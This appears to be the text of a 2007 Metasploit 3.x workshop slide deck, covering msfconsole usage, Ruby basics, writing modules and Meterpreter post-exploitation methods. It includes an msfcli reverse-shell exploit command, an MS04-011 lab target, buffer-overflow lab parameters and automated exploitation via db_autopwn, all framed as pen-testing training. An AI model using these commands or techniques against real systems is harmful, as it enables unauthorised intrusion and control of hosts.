2. Exploitation Frameworks:
Metasploit 3.x Workshop
Steven McGrath
1
What to Accomplish
Understanding Metasploit as a user
Understanding the basics of Ruby
Understanding Metasploit as a developer
Understanding Metasploit as a expert
2
What this is...
To help better an understanding of Metasploit
To learn how to use the framework in exploit research
To learn how to use Metasploit in pen-testing.
3
3. What this is NOT...
l33t h@x0r class
Reasons why Metasploit is better than everything
else...it isn’t
h@x0ring this network.
4
You should have...
Backtrack Image (supplied)
VMWare Player/Workstation/Fusion (supplied)
A laptop to run all of this on (NOT supplied)
5
Starting off
What is Metasploit?
How is it used?
What are other tools?
What benefits does Metasploit have?
6
4. What is it?
Metasploit is an exploitation framework, NOT a
vulnerability scanner.
7
How is it used?
Primarily an aide in exploitation research.
Secondarily used in pen-testing.
8
What are other tools?
CORE Impact
CANVAS
9
5. Benefits?
Price
CORE Impact = $25,000 USD a year
CANVAS = $1244 USD + Support
Flexibility
Open Source = More Options
10
Downsides?
Flexibility
Most Metasploit payloads are windows specific.
Completeness
The framework is under active development,
however there are still holes in the framework
that need to be addressed.
11
Metasploit as a User
12
6. What to cover?
Control Interfaces
Basic usage
13
msfconsole
Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable
14
msfconsole
Automation?
Automation is achieved through resource files. They
contain a list of commands that msfconsole should
run as if the user had inputted them and startup of
the console.
15
7. msfconsole
Configuration files?
msfconsole by default has the ability to store per-
user configuration data. This is typically stored in
~/.msf3 by default.
16
msfconsole
set unset
load unload
use show
save sessions
jobs route
Basic Commands:
info irb
loadpath back
check exploit
run route
17
msfconsole - set/unset
set - Sets a variable to the specified value. Also can
show a list of variables that can be set when run alone.
unset - Will “unset” or remove the value from a variable
or series of variables.
setg - Global equivilent of set.
unsetg - Global equinilent of unset.
NOTE: local variables will override globals.
18
8. msfconsole - load/unload
load - Will load a plugin from the framework. You can
also pass values to optional variables at load.
unload - Will unload a plugin.
loadpath - Adds a module path for the framework to
search and load modules. Useful for custom modules.
19
msfconsole - show/use
show - Will display lists of modules: auxilary, exploits,
payloads, encoders, and nops.
use - Use changes your context within the framework.
back - Returns you to the global context.
20
msfconsole - save
save - Saves your current state (e.g. current module
and set variables)
21
9. msfconsole - sessions
sessions - Session interations...
-i - Interacts with the specified session.
-l - Lists the active sessions.
22
msfconsole - jobs
jobs - Will display information in reguards to
backgrounded jobs (typically client-side exploits)
-l - List the active jobs.
-k - Kills the specified job.
23
msfconsole - route
route - Allows you to interact with the framework
routing table (useful in “pivoting”).
24
10. msfconsole - info
info - Will display information about the specified
module(s).
25
msfconsole - irb
irb - Provides an interactive ruby shell into the
framework. This is useful for live scripting and/or
modification to code.
26
msfconsole - check/exploit
check - Checks to see if the specified target is
vulnerable to an exploit.
exploit - Will launch an exploit on the specified target.
run - Will launch an auxiliary module against the
specified target(s).
NOTE: Normally checks are not required to exploit a
target.
27
11. msfconsole - rcheck/rexploit
rcheck - Will first reload the module from disk before
running the check.
rexploit - Same as rcheck, but will launch the actual
exploit.
28
msfcli
Commandline Interface
Arguments are passed to tell Metasploit what to do
Traditionally used for automation
29
msfcli
Example:
./msfcli exploit/example
RHOST=192.168.1.100
LHOST=192.168.1.50
PAYLOAD=windows/shell/reverse_tcp E
30
12. msfcli
./msfcli -h for more info
31
msfweb
Web Interface to Metasploit
Ruby on Rails application
The primary interface for Windows
32
33
13. 34
msfgui
Still under HEAVY development
GTK GUI to Metasploit
Attempt to make Metasploit more like CANVAS and
CORE from the User’s standpoint
35
msfd
Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the
hassle of screen.
Pivot points
Exploits
Sessions
36
14. Before we continue...
From this point on we will be assuming msfconsole
37
Exploit Me!
Target: 10.0.0.5
Exploit Module to use: windows/smb/ms04_011_lsass
Payload: Anything you choose!
Feel free to ask your classmates and myself :)
38
Metasploit as a Developer
39
15. Metasploit as a Developer
This will be a hands-on workshop.
You WILL be writing your own exploit before we leave.
Due to constraints, we will be focusing viewing a few
example modules for code examples before the
workshop portion.
40
Starting off...
Getting to know Ruby
A general understanding of how Metasploit 3.x is built
Example Code
Lab
41
Getting to know Ruby
Interpreted, not compiled.
Object Oriented by design
The Red-headed stepchild of Python, Perl, and
SmallTalk
42
16. Getting to know Ruby
Hello World:
#!/usr/bin/env ruby
# This is the hello world
Application
var1=quot;Hello World!quot;
print quot;n#{var1}nquot;
print var1, quot;nquot;
43
Getting to know Ruby - Lab
Extend the Basic TCP Server in your materials to
respond to any input given.
44
Getting to know Ruby - Lab
require 'socket'
port = 44455
host = localhost
server = TCPServer.new(host,port)
while(session = server.accept)
while !session.eof?
session.puts quot;R: #{session.gets}quot;
end
end
45
17. Metasploit’s Structure - Dirs
data - Data files for the framework
documentation - Examples, Guides, etc.
external - Non-framework software
lib - Framework Libraries
modules - Module root for the framework
plugins - Plugin root for the framework
scripts - Script root for the framework
tools - Development tools
46
Metasploit’s Structure - Dirs
modules
auxiliary - Auxiliary module root
encoders - Encoder module root
exploits - Exploit module root
nops - NOP module root
payloads - Payload module root
47
Metasploit’s Structure
What is the difference between an exploit and an
auxiliary module?
Exploit modules will actually deliver a payload
Auxiliary modules cover anything else
48
18. Metasploit’s Structure
49
Rex
Ruby Exploitation Library
Derived from Metasploit 2’s Pex libraries
Located in lib/rex
Rex is the base that most of the framework builds upon
50
Rex Subsystems
Architectures Encoding Exploitation
I/O Logging Nops
Non-Protocol Polymorphic
Payload
Parsers Blocks
Post-Exploit
Protocols Services
Clients
Services Sockets Text Manipulation
User Interface
51
19. Framework Core
Core interface into the framework
Handles the core aspects of the framework
Module interaction (loading, unloading, etc.)
Exploitation handling
Plugins
Sessions
Located under lib/msf/core
52
Framework Core Classes
Framework Datastore EncodedPayload
EventDispatcher ExploitDriver
Module
Auxiliary
Encoder
Handler OptionContainer
Exploit
Nop
Payload Plugin Session
53
Framework Base
Thin interaction layer between Framework Core and
Modules, Plugins, and User Interfaces
54
20. Digging In...
Now that we have a basic understanding of how the
framework is built, it’s time to dig into the plugins and
modules themselves...
55
Metasploit Plugins
Plugins extend the framework dynamically.
Plugins are NOT modules.
All of the User Interfaces are essentially plugins to the
framework.
56
Metasploit Plugins
Example Plugins
Database
msfd Threading
support
Session Session
IPS filters
hooks taggers
57
21. Metasploit Plugins
module Msf
class Plugin::Example < Msf::Plugin
module ExampleExtension
def example_ext
quot;This is a Testquot;
end
end
def initialize(framework, options)
framework.extend(ExampleExtension)
end
end
end 58
Framework Modules
Modules are used for specific uses within the
framework.
Modules use an extensible, well-defined interface for
interaction within the framework.
All modules inherit from Msf::Module.
59
Metasploit Modules
Common Hash Keys Name String
Description String
Version String
Author Array
Arch Array
Platform PlatformList
Ref Array
License String
60
22. Example Module
require 'msf/core'
module Msf
class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary
include Exploit::Remote::Tcp
include Auxiliary::Scanner
def initialize
super(
'Name' => 'HTTP Scanner',
'Author' => 'Maniac <maniac@chigeek.com>',
'Description' => %q{Scans for HTTP Servers in RHOSTS.}
)
register_options(
[
Opt::RPORT(80),
OptString.new(quot;SENDSTRINGquot;, [ false,
quot;String to send if port is openquot;, quot;HEAD / HTTP/1.0nnquot; ])
], self.class )
end
61
Example Module
def run_host(ip)
connect
sock.put(datastore['SENDSTRING'])
data = sock.get_once
print_status(ip + quot;nReceived: quot; + data + quot;nquot;)
disconnect
end
end
end
62
Framework Modules - Lab
Use the Lab module template and extend it to buffer
overflow with the following information
Host: 10.0.0.5
Return: 0xbfbfed20
76 Bytes + [target.ret].pack('V') + payload.encode
63
23. Metasploit as an Expert
64
Tasty Good Stuff!
Automation
Metaterpreter
65
Attack Automation
66
24. Attack Automation
Attack automation can happen in a number of different
ways:
Psudo-Automated
Full Automation
67
Psudo-Automation
Resource Files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
db_autopwn
Existing Nessus Data
Existing Nmap Data
68
Full Automation
db_autopwn
db_nmap - Will scan a network with nmap and then
exploit based on what it put into the database.
69
25. Metaterpreter
70
Metaterpreter
Extensible - extensions can be written to enhance
metaterpreter.
Powerful - Flexible protocol and channelized
communication.
Stealthy - No disk access and no new process.
In Memory DLL injection
71
Metaterpreter - OMGWTF!
This is how it works:
1.Metasploit sends first stage payload.
2.Payload talks back to Metasploit.
3.Metasploit sends second stage containing a DLL
injection payload.
4.Metasploit sends the metaterpreter server DLL
5.DLL injection payload loads the server DLL in
memory
6.Metaterpreter client and server communicate over
the establiched channels.
72
26. Metaterpreter - UI
client.ui
Method Description
disable_keyboard Disables the Keyboard
disable_mouse Disables the Mouse
enable_keyboard Enables the Keyboard
enable_mouse Enables the Mouse
idle_time Returns idle time in seconds
73
Metaterpreter - Filesystem
client.fs.dir
Method Description
chdir(path) Change Directories
delete(path) Delete Directory
download(dst, src, resursive Download Content to Local
entries(path) Show Contents of Directory
getwd Get the Working Directory
mkdir(path) Make Directory
upload(dst, src, recursive) Upload Content to Host
74
Metaterpreter - Filesystem
client.fs.file
Method Description
download(dest, files) Downloads Files to Local
expand_path(path) Expands Env Strings in Path
stat(path) Returns info on file
upload(dest, files) Uploads Files to Remote
75
27. Metaterpreter - Filesystem
client.fs.file.new
Method Description
(file, [r,w]) Opens file
close Closes file
read(length) Reads X bytes from file
seek(offset, whence) Seeks to offset in file
write(buffer) Writes buffer to the file
76
Metaterpreter - Networking
client.net.config
Method Description
add_route(s, n, g) Adds route
each_interface Displays interfaces
each_route Displays routes
get_interfaces Returns array of interfaces
get_routes Returns array of routing table
remove_route(s, n, g) Removes route
77
Metaterpreter - Config
client.sys.config
Method Description
getuid Returns Process UID
revert_to_self Calls RevertToSelf
Returns System Name and
sysinfo
Host Information
78
28. Metaterpreter - Power
client.sys.power
Method Description
reboot(reason) Reboots Host
shutdown(force, reason) Shuts down Host
79
Metaterpreter - Processes
client.sys.process
Method Description
each_process Displays running processes
execute(path, args, opts) Executes binary
getpid Returns current process
kill(pid) Kills process
processes Returns array of processes
open(pid, perms) Opens process
80
Metaterpreter - Registry
client.sys.registry
Method Description
close_key(hk) Closes an open key
create_key(hk, bk, perm) Creates new key
delete_key(hk, bk, recursive) Deletes key
delete_value(hk, name) Deletes reg value
enum_key(hk) Returns array of subkeys
open_key(hk, bk, perm) Opens a reg key
query_value(hk, name) Returns reg value
set_value(hk, name, type, val) Sets reg value 81
31. maniac_scanner.rb 2007-09-04
require 'msf/core'
module Msf
class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary
# Exploit mixins should be added first
include Exploit::Remote::Tcp
# Scanner mixin should be included last
include Auxiliary::Scanner
def initialize
super(
'Name' => 'Generic Scanner Template',
'Author' => 'Maniac <maniac@chigeek.com>',
'Description' => %q{
Connect to every host specified in the RHOSTS
network range, send a probe, read a response, and
print that response to the screen.
}
)
register_options(
[
# Specify the predefined RPORT option
Opt::RPORT(25),
# Specify a new option containing the string to send to the server
OptString.new(quot;SENDSTRINGquot;, [ false, quot;The string to sendquot;, quot;HEAD /
HTTP/1.0nnquot; ])
], self.class )
end
# Work with a single IP address at a time
def run_host(ip)
# Call the connect() method provided by the TCP mixin
# This is equivalent to connect()
connect
- 1/2 -
32. maniac_scanner.rb 2007-09-04
sock.put(datastore['SENDSTRING'])
data = sock.get_once
print_status(ip + quot; Received: quot; + data)
# Call the disconnect() method provided by the TCP mixin
# This is equivalent to disconnect()
disconnect
end
end
end
- 2/2 -
33. 2007-09-05
#!/usr/bin/env ruby
##### Example TCP Server Lab #####
# In this lab you will be modifying the
# code to return any input to the client.
require 'socket'
# Lets define the port and host.
port = 44455
host = localhost
# Create a new server connection.
server = TCPServer.new(host,port)
# Lets stay active as long as we are
# accepting connections.
while(session = server.accept)
# As long as we do not terminate
# our client, lets stay within this
# context.
while !session.eof?
# Something should go here ;)
end
end
- 1/1 -